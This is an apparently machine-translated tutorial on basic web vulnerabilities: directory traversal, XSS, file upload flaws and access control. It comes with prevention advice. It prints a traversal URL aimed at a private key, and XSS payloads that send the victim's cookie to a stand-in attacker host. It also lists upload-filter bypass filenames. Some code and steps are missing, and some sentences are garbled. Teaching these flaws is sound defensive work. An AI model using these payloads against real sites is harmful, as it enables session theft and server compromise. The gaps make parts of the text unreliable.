Basic hacking techniques programmers should know – Part 2

Tram Ho

Part 1

Part 2

Directory Traversal

A vulnerability that allows hackers to read files on the server, most essentially via url, be it a param or a direct path.

For example: you have url foodle.com/menus?menu=menu.pdf => foodle.com/menus?menu=../../../../ssl/private.key => finished the home server friend

Or the most easy to see is that you have the file url (usually image) foodle.com/upload/images/menu/menu2nd.png => oodle.com/upload/images => full 3 generation genealogy of menu2nd.png appeared in front of the hacker

Prevention

1. Use the content management system

If you manage multiple files, the use of a 3rd party system to help with management is a business and although it may have to pay an annual fee, but the problem is absolutely not to worry anymore.

2. File redirection

Instead of using the direct path to the file, you can use an api or something to get the file through a generic controller, for example, remember to validate the input.

3. Separate documents

Separate the types of documents, into shared, user, admin, … with that, you can assign access rights, so even if the hacker can track the path, if they don’t have the corresponding permissions, they also can’t get the information

Reflected XSS

Most of the XSS technique is Reflected XSS, the hacker does not send malicious data to the victim server, but directly sends the link containing the malicious code to the user, when the user clicks on this link, the web page will be loaded with malicious scripts. Reflected XSS is often used to steal cookies, occupy sessions, … of the victim or install keyloggers, trojans … on the victim’s computer.

For example: the victim has an account that is logged into the website welp.com

hacker will send victim a link like that www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

When the victim clicks, they will first be opened to welp.com and search for <script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

The script will execute and retrieve the cookie, and navigate to the hacker website with the cookie on the param

So hacker was able to access welp.com with the user’s account without knowing the password

Prevention

1. Validate input

Very simple and extremely effective, encode all the special characters, display them as html code, use white list to allow which character is input, ez game

2. Use the Content-Security policy

You can add this meta tag to your head

DOM-based XSS

This error, in the script, is exactly the same as the above error, but in essence it is a bit different.

  • Reflected XSS, when the victim clicks on the link containing the malicious code, the code will be received by the server as a sent param and returned to the victim as a valid part of the page’s content.
  • DOM-based, the website will always receive the unique URL and render without sending to the server, still hack your session, cookies, no need to worry =)))

The attack script is like that:

If you have a page with infinite scroll, normally when scrolling to the extra load, the url will be www.chinterest.com#1 , www.chinterest.com#2 . ..

The code to load the page data looks like that

Hacker will take advantage and change the following part # => www.chinterest.com#<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

Then the browser will load the code to read as a valid script of the page and execute

Prevention

1. Use the JavaScript Framework
2. Examine your code carefully
3. Parse JSON carefully
4. Use Development Tools to detect unsafe code
5. Do not use Uri fragments
6. Use the Content-Security policy

File Upload security vulnerabilities

Upload a malicious file to the server, then call it with the default system api or call it directly through the Directory Traversal error to execute the file, hackers can hijack your server, or force your clients to download files. code reading or other dangerous miscellaneous things. It is regularly in the top 10 security bugs.

  1. Create file hack.php

  1. upload avatar:

  1. Open the file “avatar” and upload

  1. execute command to get the full clip without cover

  1. teach the victim how to cry for the sake of crying

PHP is not the only file type, extensions like .php1, php2, 3 … or .lp, .cgi, sometimes just changing the case like PHP, PHP1, … image.jpg.php , even .htaccess

Prevention

1. Separate uploaded files
2. Make sure the uploaded files cannot be executed
3. Rename the file after uploading
4. Validate format of file and extension

Using whitelist is less painful, but there are ways to bypass:

  • Null Byte Injection: shell.php%00.jpg
  • Double Extension: shell.php.jpg , shell.php;.jpg , shell.php:jpg
  • Invalid Extension Bypass
5. validate content-type header
6. Use virus scan

You can see more information about this error here

Broken Access Control

An error occurs when the user’s access control is not strictly managed, making the user able to access information or perform actions beyond their authority, such as viewing or editing other user’s information, … It is also a common error in the top 10 according to OWASP, in general the issue of decentralization is also very complicated.

Prevention

There is also no common solution for every situation when encountering this error, but in general, we should focus on the following 3 aspects.

1. Authentication

Correctly confirm the user of the application

2. Authorization

Deciding what user rights are and cannot be made once they are authenticated

3. Check permissions

Check permissions when the user wants to perform a certain action.

Share the news now

Source : Viblo